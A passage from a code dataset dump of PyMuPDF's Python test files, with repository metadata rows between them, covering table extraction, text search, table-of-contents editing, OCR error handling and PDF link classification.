print(f'{contents=}')
if pymupdf.mupdf_version_tuple >= (1, 24, 2):
assert b" 1e-" not in contents
else:
assert b" 1e-" in contents
def test_3615():
print('')
print(f'{pymupdf.pymupdf_version=}', flush=1)
print(f'{pymupdf.VersionBind=}', flush=1)
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3615.epub')
doc = pymupdf.open(path)
print(doc.pagemode)
print(doc.pagelayout)
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt
def test_3654():
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3654.docx')
content = ""
with pymupdf.open(path) as document:
for page in document:
content += page.get_text() + '\n\n'
content = content.strip()
# As of 2024-07-04 we get a warning for this input file.
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'dropping unclosed output'
def test_3727():
if pymupdf.mupdf_version_tuple < (1, 24, 9):
print('test_3727(): not running because known to segv: {pymupdf.mupdf_version=}')
return
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3727.pdf')
doc = pymupdf.open(path)
for page in doc:
page.get_pixmap(matrix = pymupdf.Matrix(2,2))
def test_3569():
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3569.pdf')
document = pymupdf.open(path)
page = document[0]
svg = page.get_svg_image(text_as_path=False)
print(f'{svg=}')
assert svg == (
'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" version="1.1" width="3024" height="2160" viewBox="0 0 3024 2160">\n'
'<defs>\n'
'<clipPath id="clip_1">\n'
'<path transform="matrix(0,-.06,-.06,-0,3024,2160)" d="M25432 10909H29692V15642H25432V10909"/>\n'
'</clipPath>\n'
'<clipPath id="clip_2">\n'
'<path transform="matrix(0,-.06,-.06,-0,3024,2160)" d="M28526 38017 31807 40376V40379L31312 41314V42889H28202L25092 42888V42887L28524 38017H28526"/>\n'
'</clipPath>\n'
'</defs>\n'
'<g clip-path="url(#clip_1)">\n'
'<g inkscape:groupmode="layer" inkscape:label="CED - Text">\n'
'<text xml:space="preserve" transform="matrix(.06 0 0 .06 3024 2160)" font-size="174.644" font-family="ArialMT"><tspan y="-28538" x="-14909 -14841.063 -14773.127 -14676.024 -14578.922 -14520.766 -14423.663">**L1-13</tspan></text>\n'
'</g>\n'
'</g>\n'
'<g clip-path="url(#clip_2)">\n'
'<g inkscape:groupmode="layer" inkscape:label="Level 03|S-COLS">\n'
'<path transform="matrix(0,-.06,-.06,-0,3024,2160)" d="M31130 41483V42083L30530 41483ZM31130 42083 30530 41483V42083Z" fill="#7f7f7f"/>\n'
'<path transform="matrix(0,-.06,-.06,-0,3024,2160)" stroke-width="0" stroke-linecap="butt" stroke-miterlimit="10" stroke-linejoin="miter" fill="none" stroke="#7f7f7f" d="M31130 41483V42083L30530 41483ZM31130 42083 30530 41483V42083Z"/>\n'
'<path transform="matrix(0,-.06,-.06,-0,3024,2160)" stroke-width="9" stroke-linecap="round" stroke-linejoin="round" fill="none" stroke="#7f7f7f" d="M30530 41483H31130V42083H30530V41483"/>\n'
'</g>\n'
'</g>\n'
'</svg>\n'
)
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'unknown cid collection: PDFAUTOCAD-Indentity0\nnon-embedded font using identity encoding: ArialMT (mapping via )\ninvalid marked content and clip nesting'
def test_3450():
# This issue is a slow-down, so we just show time taken - it's not safe
# to fail if test takes too long because that can give spurious failures
# depending on hardware etc.
#
# On a mac-mini, PyMuPDF-1.24.8 takes 60s, PyMuPDF-1.24.9 takes 4s.
#
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3450.pdf')
pdf = pymupdf.open(path)
page = pdf[0]
t = time.time()
pix = page.get_pixmap(alpha=False, dpi=150)
t = time.time() - t
print(f'test_3450(): {t=}')
def test_3859():
if pymupdf.mupdf_version_tuple > (1, 24, 9):
print(f'{pymupdf.mupdf.PDF_NULL=}.')
print(f'{pymupdf.mupdf.PDF_TRUE=}.')
print(f'{pymupdf.mupdf.PDF_FALSE=}.')
for name in ('NULL', 'TRUE', 'FALSE'):
name2 = f'PDF_{name}'
v = getattr(pymupdf.mupdf, name2)
print(f'{name=} {name2=} {v=} {type(v)=}')
assert type(v)==pymupdf.mupdf.PdfObj, f'`v` is not a pymupdf.mupdf.PdfObj.'
else:
assert not hasattr(pymupdf.mupdf, 'PDF_TRUE')
def test_3905():
data = b'A,B,C,D\r\n1,2,1,2\r\n2,2,1,2\r\n'
try:
document = pymupdf.open(stream=data)
except pymupdf.FileDataError as e:
pass
else:
assert 0
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'format error: cannot recognize version marker\ntrying to repair broken xref\nrepairing PDF document'
def test_3624():
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3624.pdf')
path_png_expected = os.path.normpath(f'{__file__}/../../tests/resources/test_3624_expected.png')
path_png = os.path.normpath(f'{__file__}/../../tests/test_3624.png')
with pymupdf.open(path) as document:
page = document[0]
pixmap = page.get_pixmap(matrix=pymupdf.Matrix(2, 2))
print(f'Saving to {path_png=}.')
pixmap.save(path_png)
rms = gentle_compare.pixmaps_rms(path_png_expected, path_png)
if pymupdf.mupdf_version_tuple < (1, 24, 10):
assert rms > 12
else:
# We get small differences in sysinstall tests, where some
# thirdparty libraries can differ.
assert rms < 1
| 54,825 | Python | .py | 1,337 | 33.103964 | 312 | 0.611417 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,346 | test_tables.py | pymupdf_PyMuPDF/tests/test_tables.py | import os
import io
from pprint import pprint
import pymupdf
import pickle
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "chinese-tables.pdf")
pickle_file = os.path.join(scriptdir, "resources", "chinese-tables.pickle")
def test_table1():
"""Compare pickled tables with those of the current run."""
pickle_in = open(pickle_file, "rb")
doc = pymupdf.open(filename)
page = doc[0]
tabs = page.find_tables()
cells = tabs[0].cells + tabs[1].cells # all table cell tuples on page
extracts = [tabs[0].extract(), tabs[1].extract()] # all table cell content
old_data = pickle.load(pickle_in) # previously saved data
# Compare cell contents
assert old_data["extracts"] == extracts # same cell contents
# Compare cell coordinates.
# Cell rectangles may get somewhat larger due to more cautious border
# computations, but any differences must be small.
old_cells = old_data["cells"][0] + old_data["cells"][1]
assert len(cells) == len(old_cells)
for i in range(len(cells)):
c1 = pymupdf.Rect(cells[i]) # new cell coordinates
c0 = pymupdf.Rect(old_cells[i]) # old cell coordinates
assert c0 in c1 # always: old contained in new
assert abs(c1 - c0) < 0.2 # difference must be small
def test_table2():
"""Confirm header properties."""
doc = pymupdf.open(filename)
page = doc[0]
tab1, tab2 = page.find_tables().tables
# both tables contain their header data
assert tab1.header.external == False
assert tab1.header.cells == tab1.rows[0].cells
assert tab2.header.external == False
assert tab2.header.cells == tab2.rows[0].cells
def test_2812():
"""Ensure table detection and extraction independent from page rotation.
Make 4 pages with rotations 0, 90, 180 and 270 degrees respectively.
Each page shows the same 8x5 table.
We will check that each table is detected and delivers the same content.
"""
doc = pymupdf.open()
# Page 0: rotation 0
page = doc.new_page(width=842, height=595)
rect = page.rect + (72, 72, -72, -72)
cols = 5
rows = 8
# define the cells, draw the grid and insert unique text in each cell.
cells = pymupdf.make_table(rect, rows=rows, cols=cols)
for i in range(rows):
for j in range(cols):
page.draw_rect(cells[i][j])
for i in range(rows):
for j in range(cols):
page.insert_textbox(
cells[i][j],
f"cell[{i}][{j}]",
align=pymupdf.TEXT_ALIGN_CENTER,
)
page.clean_contents()
# Page 1: rotation 90 degrees
page = doc.new_page()
rect = page.rect + (72, 72, -72, -72)
cols = 8
rows = 5
cells = pymupdf.make_table(rect, rows=rows, cols=cols)
for i in range(rows):
for j in range(cols):
page.draw_rect(cells[i][j])
for i in range(rows):
for j in range(cols):
page.insert_textbox(
cells[i][j],
f"cell[{j}][{rows-i-1}]",
rotate=90,
align=pymupdf.TEXT_ALIGN_CENTER,
)
page.set_rotation(90)
page.clean_contents()
# Page 2: rotation 180 degrees
page = doc.new_page(width=842, height=595)
rect = page.rect + (72, 72, -72, -72)
cols = 5
rows = 8
cells = pymupdf.make_table(rect, rows=rows, cols=cols)
for i in range(rows):
for j in range(cols):
page.draw_rect(cells[i][j])
for i in range(rows):
for j in range(cols):
page.insert_textbox(
cells[i][j],
f"cell[{rows-i-1}][{cols-j-1}]",
rotate=180,
align=pymupdf.TEXT_ALIGN_CENTER,
)
page.set_rotation(180)
page.clean_contents()
# Page 3: rotation 270 degrees
page = doc.new_page()
rect = page.rect + (72, 72, -72, -72)
cols = 8
rows = 5
cells = pymupdf.make_table(rect, rows=rows, cols=cols)
for i in range(rows):
for j in range(cols):
page.draw_rect(cells[i][j])
for i in range(rows):
for j in range(cols):
page.insert_textbox(
cells[i][j],
f"cell[{cols-j-1}][{i}]",
rotate=270,
align=pymupdf.TEXT_ALIGN_CENTER,
)
page.set_rotation(270)
page.clean_contents()
pdfdata = doc.tobytes()
# doc.ez_save("test-2812.pdf")
doc.close()
# -------------------------------------------------------------------------
# Test PDF prepared. Extract table on each page and
# ensure identical extracted table data.
# -------------------------------------------------------------------------
doc = pymupdf.open("pdf", pdfdata)
extracts = []
for page in doc:
tabs = page.find_tables()
assert len(tabs.tables) == 1
tab = tabs[0]
fp = io.StringIO()
pprint(tab.extract(), stream=fp)
extracts.append(fp.getvalue())
fp = None
assert tab.row_count == 8
assert tab.col_count == 5
e0 = extracts[0]
for e in extracts[1:]:
assert e == e0
def test_2979():
"""This tests fix #2979 and #3001.
2979: identical cell count for each row
3001: no change of global glyph heights
"""
filename = os.path.join(scriptdir, "resources", "test_2979.pdf")
doc = pymupdf.open(filename)
page = doc[0]
tab = page.find_tables()[0] # extract the table
lengths = set() # stores all row cell counts
for e in tab.extract():
lengths.add(len(e)) # store number of cells for row
# test 2979
assert len(lengths) == 1
# test 3001
assert (
pymupdf.TOOLS.set_small_glyph_heights() is False
), f"{pymupdf.TOOLS.set_small_glyph_heights()=}"
def test_3062():
"""Tests the fix for #3062.
After table extraction, a rotated page should behave and look
like as before."""
filename = os.path.join(scriptdir, "resources", "test_3062.pdf")
doc = pymupdf.open(filename)
page = doc[0]
tab0 = page.find_tables()[0]
cells0 = tab0.cells
page = None
page = doc[0]
tab1 = page.find_tables()[0]
cells1 = tab1.cells
assert cells1 == cells0
def test_strict_lines():
"""Confirm that ignoring borderless rectangles improves table detection."""
filename = os.path.join(scriptdir, "resources", "strict-yes-no.pdf")
doc = pymupdf.open(filename)
page = doc[0]
tab1 = page.find_tables()[0]
tab2 = page.find_tables(strategy="lines_strict")[0]
assert tab2.row_count < tab1.row_count
assert tab2.col_count < tab1.col_count
def test_add_lines():
"""Test new parameter add_lines for table recognition."""
filename = os.path.join(scriptdir, "resources", "small-table.pdf")
doc = pymupdf.open(filename)
page = doc[0]
assert page.find_tables().tables == []
more_lines = [
((238.9949951171875, 200.0), (238.9949951171875, 300.0)),
((334.5559997558594, 200.0), (334.5559997558594, 300.0)),
((433.1809997558594, 200.0), (433.1809997558594, 300.0)),
]
# these 3 additional vertical lines should additional 3 columns
tab2 = page.find_tables(add_lines=more_lines)[0]
assert tab2.col_count == 4
assert tab2.row_count == 5
def test_3148():
"""Ensure correct extraction text of rotated text."""
doc = pymupdf.open()
page = doc.new_page()
rect = pymupdf.Rect(100, 100, 300, 300)
text = (
"rotation 0 degrees",
"rotation 90 degrees",
"rotation 180 degrees",
"rotation 270 degrees",
)
degrees = (0, 90, 180, 270)
delta = (2, 2, -2, -2)
cells = pymupdf.make_table(rect, cols=3, rows=4)
for i in range(3):
for j in range(4):
page.draw_rect(cells[j][i])
k = (i + j) % 4
page.insert_textbox(cells[j][i] + delta, text[k], rotate=degrees[k])
# doc.save("multi-degree.pdf")
tabs = page.find_tables()
tab = tabs[0]
for extract in tab.extract():
for item in extract:
item = item.replace("\n", " ")
assert item in text
def test_3179():
"""Test correct separation of multiple tables on page."""
filename = os.path.join(scriptdir, "resources", "test_3179.pdf")
doc = pymupdf.open(filename)
page = doc[0]
tabs = page.find_tables()
assert len(tabs.tables) == 3
def test_battery_file():
"""Tests correctly ignoring non-table suspects.
Earlier versions erroneously tried to identify table headers
where there existed no table at all.
"""
filename = os.path.join(scriptdir, "resources", "battery-file-22.pdf")
doc = pymupdf.open(filename)
page = doc[0]
tabs = page.find_tables()
assert len(tabs.tables) == 0
def test_markdown():
"""Confirm correct markdown output."""
filename = os.path.join(scriptdir, "resources", "strict-yes-no.pdf")
doc = pymupdf.open(filename)
page = doc[0]
tab = page.find_tables(strategy="lines_strict")[0]
text = (
"|Header1|Header2|Header3|\n"
"|---|---|---|\n"
"|Col11 Col12|Col21 Col22|Col31 Col32 Col33|\n"
"|Col13|Col23|Col34 Col35|\n"
"|Col14|Col24|Col36|\n"
"|Col15|Col25 Col26||\n\n"
)
assert tab.to_markdown() == text
def test_dotted_grid():
"""Confirm dotted lines are detected as gridlines."""
filename = os.path.join(scriptdir, "resources", "dotted-gridlines.pdf")
doc = pymupdf.open(filename)
page = doc[0]
tabs = page.find_tables()
assert len(tabs.tables) == 3 # must be 3 tables
t0, t1, t2 = tabs # extract them
# check that they have expected dimensions
assert t0.row_count, t0.col_count == (11, 12)
assert t1.row_count, t1.col_count == (25, 11)
assert t2.row_count, t2.col_count == (1, 10)
| 9,918 | Python | .py | 269 | 30.260223 | 80 | 0.606682 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,347 | test_textsearch.py | pymupdf_PyMuPDF/tests/test_textsearch.py | """
"test_search1":
Search for some text on a PDF page, and compare content of returned hit
rectangle with the searched text.
"test_search2":
Text search with 'clip' parameter - clip rectangle contains two occurrences
of searched text. Confirm search locations are inside clip.
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename1 = os.path.join(scriptdir, "resources", "2.pdf")
filename2 = os.path.join(scriptdir, "resources", "github_sample.pdf")
filename3 = os.path.join(scriptdir, "resources", "text-find-ligatures.pdf")
def test_search1():
doc = pymupdf.open(filename1)
page = doc[0]
needle = "mupdf"
rlist = page.search_for(needle)
assert rlist != []
for rect in rlist:
assert needle in page.get_textbox(rect).lower()
def test_search2():
doc = pymupdf.open(filename2)
page = doc[0]
needle = "the"
clip = pymupdf.Rect(40.5, 228.31436157226562, 346.5226135253906, 239.5338592529297)
rl = page.search_for(needle, clip=clip)
assert len(rl) == 2
for r in rl:
assert r in clip
def test_search3():
"""Ensure we find text whether or not it contains ligatures."""
doc = pymupdf.open(filename3)
page = doc[0]
needle = "flag"
hits = page.search_for(needle, flags=pymupdf.TEXTFLAGS_SEARCH)
assert len(hits) == 2 # all occurrences found
hits = page.search_for(
needle, flags=pymupdf.TEXTFLAGS_SEARCH | pymupdf.TEXT_PRESERVE_LIGATURES
)
assert len(hits) == 1 # only found text without ligatures
| 1,552 | Python | .py | 42 | 33.047619 | 87 | 0.706 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,348 | test_word_delimiters.py | pymupdf_PyMuPDF/tests/test_word_delimiters.py | import pymupdf
import string
def test_delimiters():
"""Test changing word delimiting characters."""
doc = pymupdf.open()
page = doc.new_page()
text = "word1,word2 - word3. word4?word5."
page.insert_text((50, 50), text)
# Standard words extraction:
# only spaces and line breaks start a new word
words0 = [w[4] for w in page.get_text("words")]
assert words0 == ["word1,word2", "-", "word3.", "word4?word5."]
# extract words again
words1 = [w[4] for w in page.get_text("words", delimiters=string.punctuation)]
assert words0 != words1
assert " ".join(words1) == "word1 word2 word3 word4 word5"
# confirm we will be getting old extraction
assert [w[4] for w in page.get_text("words")] == words0
| 756 | Python | .py | 18 | 37.388889 | 82 | 0.664393 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,349 | test_toc.py | pymupdf_PyMuPDF/tests/test_toc.py | """
* Verify equality of generated TOCs and expected results.
* Verify TOC deletion works
* Verify manipulation of single TOC item works
* Verify stability against circular TOC items
"""
import os
import sys
import pymupdf
import pathlib
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "001003ED.pdf")
filename2 = os.path.join(scriptdir, "resources", "2.pdf")
circular = os.path.join(scriptdir, "resources", "circular-toc.pdf")
full_toc = os.path.join(scriptdir, "resources", "full_toc.txt")
simple_toc = os.path.join(scriptdir, "resources", "simple_toc.txt")
file_3820 = os.path.join(scriptdir, "resources", "test-3820.pdf")
doc = pymupdf.open(filename)
def test_simple_toc():
simple_lines = open(simple_toc, "rb").read()
toc = b"".join([str(t).encode() for t in doc.get_toc(True)])
assert toc == simple_lines
def test_full_toc():
if not hasattr(pymupdf, "mupdf"):
# Classic implementation does not have fix for this test.
print(f"Not running test_full_toc on classic implementation.")
return
expected_path = f"{scriptdir}/resources/full_toc.txt"
expected = pathlib.Path(expected_path).read_bytes()
# Github windows x32 seems to insert \r characters; maybe something to
# do with the Python installation's line endings settings.
expected = expected.decode("utf8")
expected = expected.replace('\r', '')
toc = "\n".join([str(t) for t in doc.get_toc(False)])
toc += "\n"
assert toc == expected
def test_erase_toc():
doc.set_toc([])
assert doc.get_toc() == []
def test_replace_toc():
toc = doc.get_toc(False)
doc.set_toc(toc)
def test_setcolors():
doc = pymupdf.open(filename2)
toc = doc.get_toc(False)
for i in range(len(toc)):
d = toc[i][3]
d["color"] = (1, 0, 0)
d["bold"] = True
d["italic"] = True
doc.set_toc_item(i, dest_dict=d)
toc2 = doc.get_toc(False)
assert len(toc2) == len(toc)
for t in toc2:
d = t[3]
assert d["bold"]
assert d["italic"]
assert d["color"] == (1, 0, 0)
def test_circular():
"""The test file contains circular bookmarks."""
doc = pymupdf.open(circular)
toc = doc.get_toc(False) # this must not loop
rebased = hasattr(pymupdf, 'mupdf')
if rebased:
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'Bad or missing prev pointer in outline tree, repairing', \
f'{wt=}'
def test_2355():
# Create a test PDF with toc.
doc = pymupdf.Document()
for _ in range(10):
doc.new_page(doc.page_count)
doc.set_toc([[1, 'test', 1], [1, 'test2', 5]])
path = 'test_2355.pdf'
doc.save(path)
# Open many times
for i in range(10):
with pymupdf.open(path) as new_doc:
new_doc.get_toc()
# Open once and read many times
with pymupdf.open(path) as new_doc:
for i in range(10):
new_doc.get_toc()
def test_2788():
'''
Check handling of Document.get_toc() when toc item has kind=4.
'''
if not hasattr(pymupdf, 'mupdf'):
# Classic implementation does not have fix for this test.
print(f'Not running test_2788 on classic implementation.')
return
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2788.pdf')
document = pymupdf.open(path)
toc0 = [[1, 'page2', 2, {'kind': 4, 'xref': 14, 'page': 1, 'to': pymupdf.Point(100.0, 760.0), 'zoom': 0.0, 'nameddest': 'page.2'}]]
toc1 = document.get_toc(simple=False)
print(f'{toc0=}')
print(f'{toc1=}')
assert toc1 == toc0
doc.set_toc(toc0)
toc2 = document.get_toc(simple=False)
print(f'{toc0=}')
print(f'{toc2=}')
assert toc2 == toc0
# Also test Page.get_links() bugfix from #2817.
for page in document:
page.get_links()
rebased = hasattr(pymupdf, 'mupdf')
if rebased:
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == (
"syntax error: expected 'obj' keyword (0 3 ?)\n"
"trying to repair broken xref\n"
"repairing PDF document"
), f'{wt=}'
def test_toc_count():
file_in = os.path.abspath(f'{__file__}/../../tests/resources/test_toc_count.pdf')
file_out = os.path.abspath(f'{__file__}/../../tests/test_toc_count_out.pdf')
def get(doc):
outlines = doc.xref_get_key(doc.pdf_catalog(), "Outlines")
ret = doc.xref_object(int(outlines[1].split()[0]))
return ret
print()
with pymupdf.open(file_in) as doc:
print(f'1: {get(doc)}')
toc = doc.get_toc(simple=False)
doc.set_toc([])
#print(f'2: {get(doc)}')
doc.set_toc(toc)
print(f'3: {get(doc)}')
doc.save(file_out, garbage=4)
with pymupdf.open(file_out) as doc:
print(f'4: {get(doc)}')
pymupdf._log_items_clear()
def test_3347():
'''
Check fix for #3347 - link destination rectangles when source/destination
pages have different sizes.
'''
doc = pymupdf.open()
doc.new_page(width=500, height=800)
doc.new_page(width=800, height=500)
rects = [
(0, pymupdf.Rect(10, 20, 50, 40), pymupdf.utils.getColor('red')),
(0, pymupdf.Rect(300, 350, 400, 450), pymupdf.utils.getColor('green')),
(1, pymupdf.Rect(20, 30, 40, 50), pymupdf.utils.getColor('blue')),
(1, pymupdf.Rect(350, 300, 450, 400), pymupdf.utils.getColor('black'))
]
for page, rect, color in rects:
doc[page].draw_rect(rect, color=color)
for (from_page, from_rect, _), (to_page, to_rect, _) in zip(rects, rects[1:] + rects[:1]):
doc[from_page].insert_link({
'kind': 1,
'from': from_rect,
'page': to_page,
'to': to_rect.top_left,
})
links_expected = [
(0, {'kind': 1, 'xref': 11, 'from': pymupdf.Rect(10.0, 20.0, 50.0, 40.0), 'page': 0, 'to': pymupdf.Point(300.0, 350.0), 'zoom': 0.0, 'id': 'jorj-L0'}),
(0, {'kind': 1, 'xref': 12, 'from': pymupdf.Rect(300.0, 350.0, 400.0, 450.0), 'page': 1, 'to': pymupdf.Point(20.0, 30.0), 'zoom': 0.0, 'id': 'jorj-L1'}),
(1, {'kind': 1, 'xref': 13, 'from': pymupdf.Rect(20.0, 30.0, 40.0, 50.0), 'page': 1, 'to': pymupdf.Point(350.0, 300.0), 'zoom': 0.0, 'id': 'jorj-L0'}),
(1, {'kind': 1, 'xref': 14, 'from': pymupdf.Rect(350.0, 300.0, 450.0, 400.0), 'page': 0, 'to': pymupdf.Point(10.0, 20.0), 'zoom': 0.0, 'id': 'jorj-L1'}),
]
path = os.path.normpath(f'{__file__}/../../tests/test_3347_out.pdf')
doc.save(path)
print(f'Have saved to {path=}.')
links_actual = list()
for page_i, page in enumerate(doc):
links = page.get_links()
for link_i, link in enumerate(links):
print(f'{page_i=} {link_i=}: {link!r}')
links_actual.append( (page_i, link) )
assert links_actual == links_expected
def test_3400():
'''
Check fix for #3400 - link destination rectangles when source/destination
pages have different rotations.
'''
width = 750
height = 1110
circle_middle_point = pymupdf.Point(height / 4, width / 4)
print(f'{circle_middle_point=}')
with pymupdf.open() as doc:
page = doc.new_page(width=width, height=height)
page.set_rotation(270)
# draw a circle at the middle point to facilitate debugging
page.draw_circle(circle_middle_point, color=(0, 0, 1), radius=5, width=2)
for i in range(10):
for j in range(10):
x = i/10 * width
y = j/10 * height
page.draw_circle(pymupdf.Point(x, y), color=(0,0,0), radius=0.2, width=0.1)
page.insert_htmlbox(pymupdf.Rect(x, y, x+width/10, y+height/20), f'<small><small><small><small>({x=:.1f},{y=:.1f})</small></small></small></small>', )
# rotate the middle point by the page rotation for the new toc entry
toc_link_coords = circle_middle_point
print(f'{toc_link_coords=}')
toc = [
(
1,
"Link to circle",
1,
{
"kind": pymupdf.LINK_GOTO,
"page": 1,
"to": toc_link_coords,
"from": pymupdf.Rect(0, 0, height / 4, width / 4),
},
)
]
doc.set_toc(toc, 0) # set the toc
page = doc.new_page(width=200, height=300)
from_rect = pymupdf.Rect(10, 10, 100, 50)
page.insert_htmlbox(from_rect, 'link')
link = dict()
link['from'] = from_rect
link['kind'] = pymupdf.LINK_GOTO
link['to'] = toc_link_coords
link['page'] = 0
page.insert_link(link)
path = os.path.normpath(f'{__file__}/../../tests/test_3400.pdf')
doc.save(path)
print(f'Saved to {path=}.')
links_expected = [
(1, {'kind': 1, 'xref': 1120, 'from': pymupdf.Rect(10.0, 10.0, 100.0, 50.0), 'page': 0, 'to': pymupdf.Point(187.5, 472.5), 'zoom': 0.0, 'id': 'jorj-L0'})
]
links_actual = list()
for page_i, page in enumerate(doc):
links = page.get_links()
for link_i, link in enumerate(links):
print(f'({page_i}, {link!r})')
links_actual.append( (page_i, link) )
assert links_actual == links_expected
def test_3820():
"""Ensure all extended TOC items point to pages."""
doc = pymupdf.open(file_3820)
toc = doc.get_toc(simple=False)
for _, _, epage, dest in toc:
assert epage == dest["page"] + 1
| 9,763 | Python | .py | 237 | 33.160338 | 169 | 0.576624 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,350 | test_tesseract.py | pymupdf_PyMuPDF/tests/test_tesseract.py | import os
import platform
import pymupdf
def test_tesseract():
'''
This checks that MuPDF has been built with tesseract support.
By default we don't supply a valid `tessdata` directory, and just assert
that attempting to use Tesseract raises the expected error (which checks
that MuPDF is built with Tesseract support).
But if TESSDATA_PREFIX is set in the environment, we assert that
FzPage.get_textpage_ocr() succeeds.
'''
path = os.path.abspath( f'{__file__}/../resources/2.pdf')
doc = pymupdf.open( path)
page = doc[5]
if hasattr(pymupdf, 'mupdf'):
# rebased.
if pymupdf.mupdf_version_tuple >= (1, 24):
e_expected = 'code=3: OCR initialisation failed'
if platform.system() == 'OpenBSD':
# 2023-12-12: For some reason the SWIG catch code only catches
# the exception as FzErrorBase.
e_expected_type = pymupdf.mupdf.FzErrorBase
print(f'OpenBSD workaround - expecting FzErrorBase, not FzErrorLibrary.')
else:
e_expected_type = pymupdf.mupdf.FzErrorLibrary
else:
e_expected = 'code=2: OCR initialisation failed'
e_expected_type = None
else:
# classic.
e_expected = 'OCR initialisation failed'
e_expected_type = None
tessdata_prefix = os.environ.get('TESSDATA_PREFIX')
if tessdata_prefix:
tp = page.get_textpage_ocr(full=True)
print(f'test_tesseract(): page.get_textpage_ocr() succeeded')
else:
try:
tp = page.get_textpage_ocr(full=True, tessdata='/foo/bar')
except Exception as e:
e_text = str(e)
print(f'Received exception as expected.')
print(f'{type(e)=}')
print(f'{e_text=}')
assert e_text == e_expected, f'Unexpected exception: {e_text!r}'
if e_expected_type:
print(f'{e_expected_type=}')
assert type(e) == e_expected_type, f'{type(e)=} != {e_expected_type=}.'
else:
assert 0, f'Expected exception {e_expected!r}'
rebased = hasattr(pymupdf, 'mupdf')
if rebased:
wt = pymupdf.TOOLS.mupdf_warnings()
if pymupdf.mupdf_version_tuple < (1, 25):
assert wt
else:
assert wt == (
'UNHANDLED EXCEPTION!\n'
'library error: Tesseract initialisation failed\n'
'dropping unclosed output'
)
| 2,595 | Python | .py | 62 | 30.951613 | 89 | 0.579992 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,351 | test_named_links.py | pymupdf_PyMuPDF/tests/test_named_links.py | import pymupdf
import os
def test_2886():
"""Confirm correct insertion of a 'named' link."""
if not hasattr(pymupdf, "mupdf"):
print(f"test_2886(): not running on classic.")
return
path = os.path.abspath(f"{__file__}/../../tests/resources/cython.pdf")
doc = pymupdf.open(path)
# name "Doc-Start" is a valid named destination in that file
link = {
"kind": pymupdf.LINK_NAMED,
"from": pymupdf.Rect(0, 0, 50, 50),
"name": "Doc-Start",
}
# insert this link in an arbitrary page & rect
page = doc[-1]
page.insert_link(link)
# need this to update the internal MuPDF annotations array
page = doc.reload_page(page)
# our new link must be the last in the following list
links = page.get_links()
l_dict = links[-1]
assert l_dict["kind"] == pymupdf.LINK_NAMED
assert l_dict["nameddest"] == link["name"]
assert l_dict["from"] == link["from"]
def test_2922():
"""Confirm correct recycling of a 'named' link.
Re-insertion of a named link item in 'Page.get_links()' does not have
the required "name" key. We test the fallback here that uses key
"nameddest" instead.
"""
if not hasattr(pymupdf, "mupdf"):
print(f"test_2922(): not running on classic.")
return
path = os.path.abspath(f"{__file__}/../../tests/resources/cython.pdf")
doc = pymupdf.open(path)
page = doc[2] # page has a few links, all are named
links = page.get_links() # list of all links
link0 = links[0] # take arbitrary link (1st one is ok)
page.insert_link(link0) # insert it again
page = doc.reload_page(page) # ensure page updates
links = page.get_links() # access all links again
link1 = links[-1] # re-inserted link
# confirm equality of relevant key-values
assert link0["nameddest"] == link1["nameddest"]
assert link0["page"] == link1["page"]
assert link0["to"] == link1["to"]
assert link0["from"] == link1["from"]
def test_3301():
"""Test correct differentiation between URI and LAUNCH links.
Links encoded as /URI in PDF are converted to either LINK_URI or
LINK_LAUNCH in PyMuPDF.
This function ensures that the 'Link.uri' containing a ':' colon
is converted to a URI if not explicitly starting with "file://".
"""
if not hasattr(pymupdf, "mupdf"):
print(f"test_3301(): not running on classic.")
return
# list of links and their expected link "kind" upon extraction
text = {
"https://www.google.de": pymupdf.LINK_URI,
"http://www.google.de": pymupdf.LINK_URI,
"mailto:jorj.x.mckie@outlook.de": pymupdf.LINK_URI,
"www.wikipedia.de": pymupdf.LINK_LAUNCH,
"awkward:resource": pymupdf.LINK_URI,
"ftp://www.google.de": pymupdf.LINK_URI,
"some.program": pymupdf.LINK_LAUNCH,
"file://some.program": pymupdf.LINK_LAUNCH,
"another.exe": pymupdf.LINK_LAUNCH,
}
# make enough "from" rectangles
r = pymupdf.Rect(0, 0, 50, 20)
rects = [r + (0, r.height * i, 0, r.height * i) for i in range(len(text.keys()))]
# make test page and insert above links as kind=LINK_URI
doc = pymupdf.open()
page = doc.new_page()
for i, k in enumerate(text.keys()):
link = {"kind": pymupdf.LINK_URI, "uri": k, "from": rects[i]}
page.insert_link(link)
# re-cycle the PDF preparing for link extraction
pdfdata = doc.write()
doc = pymupdf.open("pdf", pdfdata)
page = doc[0]
for link in page.get_links():
# Extract the link text. Must be 'file' or 'uri'.
t = link["uri"] if (_ := link.get("file")) is None else _
assert text[t] == link["kind"]
